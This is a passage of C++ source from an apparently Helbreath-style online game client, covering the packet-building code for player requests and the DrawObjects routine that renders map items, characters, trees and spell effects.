		iRet = m_pGSock->iSendMsg(cMsg, 56, cKey);
		break;

	case MSGID_REQUEST_TELEPORT:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = DEF_MSGTYPE_CONFIRM;

		iRet = m_pGSock->iSendMsg(cMsg, 6);

		m_bIsTeleportRequested = TRUE;
		break;

	case MSGID_REQUEST_CIVILRIGHT:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = DEF_MSGTYPE_CONFIRM;

		iRet = m_pGSock->iSendMsg(cMsg, 6);
		break;

	case MSGID_REQUEST_RETRIEVEITEM:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = DEF_MSGTYPE_CONFIRM;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		*cp = (char)iV1;

		iRet = m_pGSock->iSendMsg(cMsg, 7);
		break;

	case MSGID_REQUEST_NOTICEMENT:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		*ip = iV1;
		cp += 4;

		iRet = m_pGSock->iSendMsg(cMsg, 10, cKey);
		break;

	case  MSGID_REQUEST_FIGHTZONE_RESERVE:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		fightzonenum = (int *)cp;
		*fightzonenum = iV1;
		cp += 4;

		iRet = m_pGSock->iSendMsg(cMsg, 10);
		break;

	case MSGID_STATECHANGEPOINT:
		// Diuuude
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;
		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		*cp = cStateChange1;
		cp++;
		*cp = cStateChange2;
		cp++;
		*cp = cStateChange3;
		cp++;
		iRet = m_pGSock->iSendMsg(cMsg, 12);
		break;

	default:
		if (m_bIsTeleportRequested == TRUE) return FALSE;

		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = wCommand;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		sp = (short *)cp;
		*sp = m_sPlayerX;
		cp += 2;

		sp = (short *)cp;
		*sp = m_sPlayerY;
		cp += 2;

		*cp = cDir;
		cp++;

		sp  = (short *)cp;
		*sp = (short)iV1;
		cp += 2;

		sp  = (short *)cp;
		*sp = (short)iV2;
		cp += 2;

		sp  = (short *)cp;
		*sp = (short)iV3;
		cp += 2;
		if ((wCommand == DEF_OBJECTATTACK) || (wCommand == DEF_OBJECTATTACKMOVE))
		{	sp  = (short *)cp;
			*sp = (short)iV4;
			cp += 2;
			dwp = (DWORD *)cp;
			*dwp = dwTime;
			cp += 4;
			iRet = m_pGSock->iSendMsg(cMsg, 19 +4);
		}else
		{	dwp = (DWORD *)cp;
			*dwp = dwTime;
			cp += 4;

			iRet = m_pGSock->iSendMsg(cMsg, 17 +4); //v2.171
		}
		m_cCommandCount++;
		break;
	}
	switch (iRet) {
	case DEF_XSOCKEVENT_SOCKETCLOSED:
	case DEF_XSOCKEVENT_SOCKETERROR:
	case DEF_XSOCKEVENT_QUENEFULL:
		ChangeGameMode(DEF_GAMEMODE_ONCONNECTIONLOST);
		delete m_pGSock;
		m_pGSock = NULL;
		break;

	case DEF_XSOCKEVENT_CRITICALERROR:
		delete m_pGSock;
		m_pGSock = NULL;
		if (G_pCalcSocket != NULL) {
			delete G_pCalcSocket;
			G_pCalcSocket = NULL;
		}
		SendMessage(m_hWnd, WM_DESTROY, NULL, NULL);
		break;
	}
	return TRUE;
}


void CGame::DrawObjects(short sPivotX, short sPivotY, short sDivX, short sDivY, short sModX, short sModY, short msX, short msY)
{int ix, iy, indexX, indexY, dX, dY, iDvalue;
 char cItemColor;
 BOOL bIsPlayerDrawed = FALSE;
 BOOL bContact = FALSE;
 BOOL bRet = FALSE;
 short sItemSprite, sItemSpriteFrame, sObjSpr, sObjSprFrame, sDynamicObject, sDynamicObjectFrame;
 static DWORD dwMCAnimTime = G_dwGlobalTime;
 static short sMCAnimFrame = 1;
// Xmas
 static int ix1[100];
 static int iy2[100];
 static int iXmasTreeBulbDelay = 76;
 int idelay = 75;

	if( sDivY < 0 || sDivX < 0) return ;
	m_sMCX = NULL;
	m_sMCY = NULL;
	ZeroMemory(m_cMCName, sizeof(m_cMCName));

	DWORD dwTime = m_dwCurTime;
	m_stMCursor.sCursorFrame = 0;

	indexY = sDivY + sPivotY - 7;
#ifdef RES_HIGH
	for (iy = -sModY - 224; iy <= 547 + 352; iy += 32)
	{
		indexX = sDivX + sPivotX - 4;
		for (ix = -sModX - 128; ix <= 800 + 128; ix += 32)
		{	sDynamicObject = NULL;
			bRet = FALSE;
			if ((ix >= -sModX) && (ix <= 800 + 16) && (iy >= -sModY) && (iy <= 547 + 32 + 16))
#else
	for (iy = -sModY-224; iy <= 427+352; iy += 32)
	{	indexX = sDivX + sPivotX-4;
		for (ix = -sModX-128 ; ix <= 640 + 128; ix += 32)
		{	sDynamicObject = NULL;
			bRet = FALSE;
			if ((ix >= -sModX) && (ix <= 640+16) && (iy >= -sModY) && (iy <= 427+32+16))
#endif			
			{	_tmp_wObjectID = _tmp_sOwnerType = _tmp_sAppr1 = _tmp_sAppr2 = _tmp_sAppr3 = _tmp_sAppr4 = _tmp_iStatus = _tmp_iStatus2 = NULL;
				_tmp_cDir = _tmp_cFrame = 0;
				_tmp_iEffectType = _tmp_iEffectFrame = _tmp_iChatIndex = 0;
				ZeroMemory(_tmp_cName, sizeof(_tmp_cName));
				if ((indexX < m_pMapData->m_sPivotX) || (indexX > m_pMapData->m_sPivotX + MAPDATASIZEX) ||
					(indexY < m_pMapData->m_sPivotY) || (indexY > m_pMapData->m_sPivotY + MAPDATASIZEY))
				{	sItemSprite = NULL;
					sItemSpriteFrame = NULL;
					bRet = FALSE;
					cItemColor = NULL;
				}else
				{	_tmp_dX = dX = indexX - m_pMapData->m_sPivotX;
					_tmp_dY = dY = indexY - m_pMapData->m_sPivotY;
					_tmp_wObjectID  = m_pMapData->m_pData[dX][dY].m_wDeadObjectID;
					_tmp_sOwnerType = m_pMapData->m_pData[dX][dY].m_sDeadOwnerType;
					_tmp_cDir       = m_pMapData->m_pData[dX][dY].m_cDeadDir;
					_tmp_sAppr1     = m_pMapData->m_pData[dX][dY].m_sDeadAppr1;
					_tmp_sAppr2     = m_pMapData->m_pData[dX][dY].m_sDeadAppr2;
					_tmp_sAppr3     = m_pMapData->m_pData[dX][dY].m_sDeadAppr3;
					_tmp_sAppr4     = m_pMapData->m_pData[dX][dY].m_sDeadAppr4;
					_tmp_iApprColor = m_pMapData->m_pData[dX][dY].m_iDeadApprColor;
					_tmp_cFrame     = m_pMapData->m_pData[dX][dY].m_cDeadOwnerFrame;
					_tmp_iChatIndex = m_pMapData->m_pData[dX][dY].m_iDeadChatMsg;
					_tmp_iStatus    = m_pMapData->m_pData[dX][dY].m_iDeadStatus;
					strcpy(_tmp_cName, m_pMapData->m_pData[dX][dY].m_cDeadOwnerName);
					sItemSprite      = m_pMapData->m_pData[dX][dY].m_sItemSprite;
					sItemSpriteFrame = m_pMapData->m_pData[dX][dY].m_sItemSpriteFrame;
					cItemColor       = m_pMapData->m_pData[dX][dY].m_cItemColor;
					sDynamicObject      = m_pMapData->m_pData[dX][dY].m_sDynamicObjectType;
					sDynamicObjectFrame = (short)m_pMapData->m_pData[dX][dY].m_cDynamicObjectFrame;
					cDynamicObjectData1 = m_pMapData->m_pData[dX][dY].m_cDynamicObjectData1;
					cDynamicObjectData2 = m_pMapData->m_pData[dX][dY].m_cDynamicObjectData2;
					cDynamicObjectData3 = m_pMapData->m_pData[dX][dY].m_cDynamicObjectData3;
					cDynamicObjectData4 = m_pMapData->m_pData[dX][dY].m_cDynamicObjectData4;
					bRet = TRUE;
			 	}

				if ((bRet == TRUE) && (sItemSprite != 0))
				{	if (cItemColor == 0)
						 m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + sItemSprite]->PutSpriteFast(ix, iy, sItemSpriteFrame, dwTime);
					else
					{	switch (sItemSprite) {
						case 1: // Swds
						case 2: // Bows
						case 3: // Shields
						case 15: // Axes hammers
							m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + sItemSprite]->PutSpriteRGB(ix, iy
								, sItemSpriteFrame, m_wWR[cItemColor] -m_wR[0], m_wWG[cItemColor] -m_wG[0], m_wWB[cItemColor] -m_wB[0], dwTime);
							break;
						default:
							m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + sItemSprite]->PutSpriteRGB(ix, iy
								, sItemSpriteFrame, m_wR[cItemColor] -m_wR[0], m_wG[cItemColor] -m_wG[0], m_wB[cItemColor] -m_wB[0], dwTime);
							break;
					}	}

					if ((ix - 13 < msX)	&& (ix + 13 > msX) && (iy - 13 < msY) && (iy + 13 > msY))
					{	if ((dwTime - dwMCAnimTime)	> 200)
						{	dwMCAnimTime = dwTime;
							if (sMCAnimFrame == 1)
								 sMCAnimFrame = 2;
							else sMCAnimFrame = 1;
						}
						m_stMCursor.sCursorFrame  = sMCAnimFrame;
				}	}

				if ((bRet == TRUE) && (_tmp_wObjectID != NULL))
				{	bContact = DrawObject_OnDead(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
				}

#ifdef RES_HIGH
				if ((bContact == TRUE) && (msY <= 551))
#else
				if ((bContact == TRUE) && (msY <= 431))
#endif
				{	m_sMCX = indexX;
					m_sMCY = indexY;
					sFocusX = ix;
					sFocusY = iy;
					sFocusOwnerType = _tmp_sOwnerType;
					cFocusAction = DEF_OBJECTDEAD;
					wFocusObjectID = _tmp_wObjectID;
					cFocusFrame  = _tmp_cFrame;
					cFocusDir    = _tmp_cDir;
					sFocusAppr1  = _tmp_sAppr1;
					sFocusAppr2  = _tmp_sAppr2;
					sFocusAppr3  = _tmp_sAppr3;
					sFocusAppr4  = _tmp_sAppr4;
					iFocusApprColor = _tmp_iApprColor;
					iFocuiStatus = _tmp_iStatus;
					ZeroMemory(cFocusName, sizeof(cFocusName));
					strcpy(cFocusName, _tmp_cName);
					ZeroMemory(m_cMCName, sizeof(m_cMCName));
					strcpy(m_cMCName,  _tmp_cName);
					sFocus_dX = _tmp_dX;
					sFocus_dY = _tmp_dY;
					bContact = FALSE;
				}

				_tmp_wObjectID = _tmp_sOwnerType = _tmp_sAppr1 = _tmp_sAppr2 = _tmp_sAppr3 = _tmp_sAppr4 = _tmp_iStatus = _tmp_iStatus2 = NULL;
				_tmp_cFrame = _tmp_cDir = 0;
				_tmp_iEffectType = _tmp_iEffectFrame = _tmp_iApprColor = _tmp_iChatIndex = 0;
				ZeroMemory(_tmp_cName, sizeof(_tmp_cName));

				if ((indexX < m_pMapData->m_sPivotX) || (indexX > m_pMapData->m_sPivotX + MAPDATASIZEX) ||
					(indexY < m_pMapData->m_sPivotY) || (indexY > m_pMapData->m_sPivotY + MAPDATASIZEY))
				{	sItemSprite = NULL;
					bRet = FALSE;
				}else
				{	_tmp_dX = dX = indexX - m_pMapData->m_sPivotX; // v2.171 2002-6-14
					_tmp_dY = dY = indexY - m_pMapData->m_sPivotY; // v2.171 2002-6-14
					_tmp_wObjectID  = m_pMapData->m_pData[dX][dY].m_wObjectID;
					_tmp_sOwnerType = m_pMapData->m_pData[dX][dY].m_sOwnerType;
					_tmp_cAction    = m_pMapData->m_pData[dX][dY].m_cOwnerAction;
					_tmp_iStatus    = m_pMapData->m_pData[dX][dY].m_iStatus;
					_tmp_cDir       = m_pMapData->m_pData[dX][dY].m_cDir;
					_tmp_sAppr1     = m_pMapData->m_pData[dX][dY].m_sAppr1;
					_tmp_sAppr2     = m_pMapData->m_pData[dX][dY].m_sAppr2;
					_tmp_sAppr3     = m_pMapData->m_pData[dX][dY].m_sAppr3;
					_tmp_sAppr4     = m_pMapData->m_pData[dX][dY].m_sAppr4;
					_tmp_iApprColor = m_pMapData->m_pData[dX][dY].m_iApprColor; // v1.4
					_tmp_cFrame     = m_pMapData->m_pData[dX][dY].m_cOwnerFrame;
					_tmp_iChatIndex = m_pMapData->m_pData[dX][dY].m_iChatMsg;
					_tmp_iEffectType  = m_pMapData->m_pData[dX][dY].m_iEffectType;
					_tmp_iEffectFrame = m_pMapData->m_pData[dX][dY].m_iEffectFrame;

					strcpy(_tmp_cName, m_pMapData->m_pData[dX][dY].m_cOwnerName);
					bRet = TRUE;

					if (m_iIlusionOwnerH != NULL)
					{	if ((strcmp(_tmp_cName, m_cPlayerName) != 0) && (_tmp_sOwnerType < 10))
						{	_tmp_sOwnerType = m_cIlusionOwnerType;
							_tmp_iStatus    = _tmp_iStatus&0xf00000f0 | m_iStatus_IE&0x0fffff0f;
							
							_tmp_sAppr1     = m_sAppr1_IE;
							_tmp_sAppr2     = m_sAppr2_IE;
							_tmp_sAppr3     = m_sAppr3_IE;
							_tmp_sAppr4     = m_sAppr4_IE;
							_tmp_iApprColor = m_iApprColor_IE;
			 	}	}	}

				if ((bRet == TRUE) && (strlen(_tmp_cName) > 0))
				{	_tmp_dx = 0;
					_tmp_dy = 0;
					switch (_tmp_cAction) {
					case DEF_OBJECTSTOP:
						bContact = DrawObject_OnStop(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;

					case DEF_OBJECTMOVE:
						bContact = DrawObject_OnMove(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;

					case DEF_OBJECTDAMAGEMOVE:
						bContact = DrawObject_OnDamageMove(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;

					case DEF_OBJECTRUN:
						bContact = DrawObject_OnRun(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;

					case DEF_OBJECTATTACK:
						bContact = DrawObject_OnAttack(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;

					case DEF_OBJECTATTACKMOVE:
						bContact = DrawObject_OnAttackMove(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;

					case DEF_OBJECTMAGIC:
						bContact = DrawObject_OnMagic(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;

					case DEF_OBJECTGETITEM:
						bContact = DrawObject_OnGetItem(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;

					case DEF_OBJECTDAMAGE:
						bContact = DrawObject_OnDamage(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;

					case DEF_OBJECTDYING:
						bContact = DrawObject_OnDying(indexX, indexY, ix, iy, FALSE, dwTime, msX, msY);
						break;
					}

#ifdef RES_HIGH
					if ((bContact == TRUE) && (msY <= 551))
#else
					if ((bContact == TRUE) && (msY <= 431))
#endif
					{	m_sMCX = indexX;
						m_sMCY = indexY;
						sFocusX = ix;
						sFocusY = iy;
						wFocusObjectID = _tmp_wObjectID;
						sFocusOwnerType = _tmp_sOwnerType;
						cFocusAction = _tmp_cAction;
						cFocusFrame  = _tmp_cFrame;
						cFocusDir    = _tmp_cDir;
						sFocusAppr1  = _tmp_sAppr1;
						sFocusAppr2  = _tmp_sAppr2;
						sFocusAppr3  = _tmp_sAppr3;
						sFocusAppr4  = _tmp_sAppr4;
						iFocusApprColor = _tmp_iApprColor; // v1.4
						iFocuiStatus = _tmp_iStatus;
						ZeroMemory(cFocusName, sizeof(cFocusName));
						strcpy(cFocusName, _tmp_cName);
						ZeroMemory(m_cMCName, sizeof(m_cMCName));
						strcpy(m_cMCName,  _tmp_cName);
						sFocus_dX = _tmp_dX; // v2.171
						sFocus_dY = _tmp_dY; // v2.171
						bContact = FALSE;
					}

					if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0)
					{	if (m_bIsObserverMode == FALSE)
						{	
#ifdef RES_HIGH
							//m_sViewDstX = (indexX * 32) - 288 - 32 - 32 - 32 - 32;
							//m_sViewDstY = (indexY * 32) - 224 - 32 - 32 - 32;
							m_sViewDstX = (indexX * 32) - 288 - 32 - 32 - 32 - 16;
							m_sViewDstY = (indexY * 32) - 224 - 32 - 32 - 16;
#else
							m_sViewDstX = (indexX*32) - 288 - 32;
							m_sViewDstY = (indexY*32) - 224;
#endif
						}
						SetRect(&m_rcPlayerRect, m_rcBodyRect.left, m_rcBodyRect.top, m_rcBodyRect.right, m_rcBodyRect.bottom);
						bIsPlayerDrawed = TRUE;
		   	}	}	}

			// CLEROTH
			sObjSpr      = m_pMapData->m_tile[indexX][indexY].m_sObjectSprite;
			sObjSprFrame = m_pMapData->m_tile[indexX][indexY].m_sObjectSpriteFrame;

			if (sObjSpr != 0)
			{	if ((sObjSpr < 100) || (sObjSpr >= 200))
				{	switch (sObjSpr) {
					case 200:
					case 223:
						m_pTileSpr[sObjSpr]->PutShadowSprite(ix - 16, iy - 16, sObjSprFrame, dwTime);
						break;

					case 224:
						switch (sObjSprFrame) {
						case 24:
						case 34:
						case 35:
						case 36:
						case 37:
						case 38:
							break;
						default:
							m_pTileSpr[sObjSpr]->PutShadowSprite(ix - 16, iy - 16, sObjSprFrame, dwTime);
							break;
					}	}
					if (m_cDetailLevel == 0) // Special Grass & Flowers
					{	if ((sObjSpr != 6) && (sObjSpr != 9))
							m_pTileSpr[sObjSpr]->PutSpriteFast(ix - 16, iy - 16, sObjSprFrame, dwTime);
					}else
					{	m_pTileSpr[sObjSpr]->PutSpriteFast(ix - 16, iy - 16, sObjSprFrame, dwTime);
					}

					switch (sObjSpr) {
					case 223:
						if (sObjSprFrame == 4)
						{	if (G_cSpriteAlphaDegree == 2) //nuit
							{	int iDvalue1 = -1*(rand() % 5);
								int iDvalue2 = -1*(rand() % 5);
								int iDvalue3 = -1*(rand() % 5);
								m_pEffectSpr[0]->PutTransSpriteRGB(ix+2 -17,  iy - 147 -15, 1, iDvalue1, iDvalue1, iDvalue1, dwTime);
								m_pEffectSpr[0]->PutTransSpriteRGB(ix+16 -17, iy - 96 -15,  1, iDvalue2, iDvalue2, iDvalue2, dwTime);
								m_pEffectSpr[0]->PutTransSpriteRGB(ix-19 -17, iy - 126 -15, 1, iDvalue3, iDvalue3, iDvalue3, dwTime);
						}	}
						break;

					case 370: // nuit
						if ( ((dwTime - m_dwEnvEffectTime) > 400) && (sObjSprFrame == 9) && (G_cSpriteAlphaDegree == 2)) bAddNewEffect(65, m_sViewPointX + ix -16 +30, m_sViewPointY + iy -16 -334, NULL, NULL, NULL, 0);
						if ( ((dwTime - m_dwEnvEffectTime) > 400) && (sObjSprFrame == 11) && (G_cSpriteAlphaDegree == 2)) bAddNewEffect(65, m_sViewPointX +ix -16 +17, m_sViewPointY + iy -16 -300, NULL, NULL, NULL, 0);
						break;

					case 374: // nuit
						if ( ((dwTime - m_dwEnvEffectTime) > 400) && (sObjSprFrame == 2) && (G_cSpriteAlphaDegree == 2)) bAddNewEffect(65, m_sViewPointX + ix -7, m_sViewPointY + iy -122, NULL, NULL, NULL, 0);
						if ( ((dwTime - m_dwEnvEffectTime) > 400) && (sObjSprFrame == 6) && (G_cSpriteAlphaDegree == 2)) bAddNewEffect(65, m_sViewPointX + ix -14, m_sViewPointY + iy -321, NULL, NULL, NULL, 0);
						if ( ((dwTime - m_dwEnvEffectTime) > 400) && (sObjSprFrame == 7) && (G_cSpriteAlphaDegree == 2)) bAddNewEffect(65, m_sViewPointX +ix +7, m_sViewPointY + iy -356, NULL, NULL, NULL, 0);
						break;

					case 376: // nuit
						if ( ((dwTime - m_dwEnvEffectTime) > 400) && (sObjSprFrame == 12) && (G_cSpriteAlphaDegree == 2)) {
							bAddNewEffect(65, m_sViewPointX + ix -16, m_sViewPointY + iy -346, NULL, NULL, NULL, 0);
							bAddNewEffect(65, m_sViewPointX + ix +11, m_sViewPointY + iy -308, NULL, NULL, NULL, 0);
						}
						break;

					case 378: // nuit
						if ( ((dwTime - m_dwEnvEffectTime) > 400) && (sObjSprFrame == 11) && (G_cSpriteAlphaDegree == 2)) bAddNewEffect(65, m_sViewPointX + ix, m_sViewPointY + iy -91, NULL, NULL, NULL, 0);
						break;

					case 382: // nuit
						if ( ((dwTime - m_dwEnvEffectTime) > 400) && (sObjSprFrame == 9) && (G_cSpriteAlphaDegree == 2)) {
							bAddNewEffect(65, m_sViewPointX + ix +73, m_sViewPointY + iy -264, NULL, NULL, NULL, 0);
							bAddNewEffect(65, m_sViewPointX + ix +23, m_sViewPointY + iy -228, NULL, NULL, NULL, 0);
						}
						break;

					case 429:
						if ( ((dwTime - m_dwEnvEffectTime) > 400) && (sObjSprFrame == 2)) bAddNewEffect(65, m_sViewPointX + ix -15, m_sViewPointY + iy -224, NULL, NULL, NULL, 0);
						break;
					}
				}else // sprites 100..199: Trees and tree shadows
				{	m_pTileSpr[sObjSpr]->_GetSpriteRect(ix - 16, iy - 16, sObjSprFrame);
					if (m_cDetailLevel==0)
					{	if( sObjSpr < 100 + 11 ) m_pTileSpr[100 + 4]->PutSpriteFast(ix - 16, iy - 16, sObjSprFrame, dwTime);
						else if( sObjSpr < 100 + 23 ) m_pTileSpr[100 + 9]->PutSpriteFast(ix - 16, iy - 16, sObjSprFrame, dwTime);
						else if( sObjSpr < 100 + 32 ) m_pTileSpr[100 + 23]->PutSpriteFast(ix - 16, iy - 16, sObjSprFrame, dwTime);
						else m_pTileSpr[100 + 32]->PutSpriteFast(ix - 16, iy - 16, sObjSprFrame, dwTime);
					}else
					{	if ((bIsPlayerDrawed == TRUE) && (m_pTileSpr[sObjSpr]->m_rcBound.top <= m_rcPlayerRect.top) && (m_pTileSpr[sObjSpr]->m_rcBound.bottom >= m_rcPlayerRect.bottom) &&
							(m_cDetailLevel >= 2) && (m_pTileSpr[sObjSpr]->m_rcBound.left <= m_rcPlayerRect.left) && (m_pTileSpr[sObjSpr]->m_rcBound.right >= m_rcPlayerRect.right))
						{	m_pTileSpr[sObjSpr + 50]->PutFadeSprite(ix , iy , sObjSprFrame, dwTime);
							m_pTileSpr[sObjSpr]->PutTransSprite2(ix - 16, iy - 16, sObjSprFrame, dwTime);
						}else
						{	m_pTileSpr[sObjSpr + 50]->PutSpriteFast(ix , iy , sObjSprFrame, dwTime);
							m_pTileSpr[sObjSpr]->PutSpriteFast(ix - 16, iy - 16, sObjSprFrame, dwTime);
						}
						if (m_bIsXmas == TRUE)
						{	if (G_cSpriteAlphaDegree == 2) // nuit
							{	if( iXmasTreeBulbDelay < 0 || iXmasTreeBulbDelay > idelay + 1) iXmasTreeBulbDelay = 0;
								if( iXmasTreeBulbDelay > idelay )
								{	for (int i = 0; i < 100; i++) {
										ix1[i] = 1*(rand() % 400)-200;
										iy2[i] = -1*(rand() % 300);
									}
									iXmasTreeBulbDelay = 0;
								}	else iXmasTreeBulbDelay++;

								for (int j = 0; j < 100; j++)
								{	if( m_pTileSpr[sObjSpr]->_bCheckCollison(ix-16, iy-16, sObjSprFrame, ix + ix1[j], iy + iy2[j]) )
									{	m_pEffectSpr[66+(j%6)]->PutTransSprite(ix + ix1[j], iy + iy2[j], (iXmasTreeBulbDelay>>2), dwTime);
			}	}	}	}	}	}	}

			// Dynamic Object
			if ( (bRet == TRUE) && (sDynamicObject != NULL) )
			{	switch (sDynamicObject) {
				case DEF_DYNAMICOBJECT_PCLOUD_BEGIN:	// 10
					if (sDynamicObjectFrame >= 0)
						m_pEffectSpr[23]->PutTransSprite50_NoColorKey(ix+(rand() % 2), iy+(rand() % 2), sDynamicObjectFrame, dwTime);
					break;

				case DEF_DYNAMICOBJECT_PCLOUD_LOOP:		// 11
					m_pEffectSpr[23]->PutTransSprite50_NoColorKey(ix+(rand() % 2), iy+(rand() % 2), sDynamicObjectFrame+8, dwTime);
					break;

				case DEF_DYNAMICOBJECT_PCLOUD_END:		// 12
					m_pEffectSpr[23]->PutTransSprite50_NoColorKey(ix+(rand() % 2), iy+(rand() % 2), sDynamicObjectFrame+16, dwTime);
					break;

				case DEF_DYNAMICOBJECT_ICESTORM:		// 8
					iDvalue = (rand() % 5)*(-1);
					m_pEffectSpr[0]->PutTransSpriteRGB(ix, iy, 1, iDvalue, iDvalue, iDvalue, dwTime);
					m_pEffectSpr[13]->PutTransSprite70_NoColorKey(ix, iy, sDynamicObjectFrame, dwTime);
					break;

				case DEF_DYNAMICOBJECT_FIRE:			// 1
				case DEF_DYNAMICOBJECT_FIRE3:			// 14
					switch (rand() % 3) {
					case 0: m_pEffectSpr[0]->PutTransSprite25_NoColorKey(ix, iy, 1, dwTime); break;
					case 1: m_pEffectSpr[0]->PutTransSprite50_NoColorKey(ix, iy, 1, dwTime); break;
					case 2: m_pEffectSpr[0]->PutTransSprite70_NoColorKey(ix, iy, 1, dwTime); break;
					}
					m_pEffectSpr[9]->PutTransSprite70_NoColorKey(ix, iy, sDynamicObjectFrame/3, dwTime);
					break;

				case DEF_DYNAMICOBJECT_FIRE2:			// 13
					switch (rand() % 3) {
					case 0: m_pEffectSpr[0]->PutTransSprite25_NoColorKey(ix, iy, 1, dwTime); break;
					case 1: m_pEffectSpr[0]->PutTransSprite50_NoColorKey(ix, iy, 1, dwTime); break;
					case 2: m_pEffectSpr[0]->PutTransSprite70_NoColorKey(ix, iy, 1, dwTime); break;
					}
					break;

				case DEF_DYNAMICOBJECT_FISH:			// 2
					{	char cTmpDOdir, cTmpDOframe;
						cTmpDOdir   = m_Misc.cCalcDirection(cDynamicObjectData1, cDynamicObjectData2, cDynamicObjectData1 + cDynamicObjectData3, cDynamicObjectData2 + cDynamicObjectData4);
						cTmpDOframe = ((cTmpDOdir-1) * 4) + (rand() % 4);
						m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+0]->PutTransSprite2(ix + cDynamicObjectData1, iy + cDynamicObjectData2, cTmpDOframe, dwTime);
					}
					break;

				case DEF_DYNAMICOBJECT_MINERAL1:		// 4
					if (m_cDetailLevel != 0) m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->PutShadowSprite(ix, iy, 0, dwTime);
					m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->PutSpriteFast(ix, iy, 0, dwTime);
					if (    (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.top != -1)
						&& (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.top < msY)
						&& (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.bottom > msY)
						&& (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.left < msX)
						&& (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.right > msX) )
					{	m_sMCX = indexX;
						m_sMCY = indexY;
						iFocuiStatus = NULL;
						ZeroMemory(cFocusName, sizeof(cFocusName));
						ZeroMemory(m_cMCName, sizeof(m_cMCName));
					}
					break;

				case DEF_DYNAMICOBJECT_MINERAL2:		// 5
					if (m_cDetailLevel != 0) m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->PutShadowSprite(ix, iy, 1, dwTime);
					m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->PutSpriteFast(ix, iy, 1, dwTime);
					if (   (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.top != -1)
						&& (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.top < msY)
						&& (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.bottom > msY)
						&& (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.left < msX)
						&& (m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+1]->m_rcBound.right > msX) )
					{	m_sMCX = indexX;
						m_sMCY = indexY;
						iFocuiStatus = NULL;
						ZeroMemory(cFocusName, sizeof(cFocusName));
						ZeroMemory(m_cMCName, sizeof(m_cMCName));
					}
					break;

				case DEF_DYNAMICOBJECT_SPIKE:			// 9
					m_pEffectSpr[17]->PutTransSprite70_NoColorKey(ix, iy, sDynamicObjectFrame, dwTime);
					break;

				case DEF_DYNAMICOBJECT_ARESDENFLAG1:  // 6
				case DEF_DYNAMICOBJECT_ELVINEFLAG1: // 7
					m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT+2]->PutSpriteFast(ix, iy, sDynamicObjectFrame, dwTime);
					break;
			}	}
			indexX++;
		}
		indexY++;
	}

	if ((dwTime - m_dwEnvEffectTime) > 300) m_dwEnvEffectTime = dwTime;

	if (m_sMCX != NULL)	// CLEROTH - STATUS
	{	if( _iGetFOE(iFocuiStatus) < 0 ) m_stMCursor.sCursorFrame = 3;
		else m_stMCursor.sCursorFrame = 6;

		_tmp_wObjectID  = wFocusObjectID;
		_tmp_sOwnerType = sFocusOwnerType;
		_tmp_cAction    = cFocusAction;
		_tmp_cFrame     = cFocusFrame;
		_tmp_cDir       = cFocusDir;
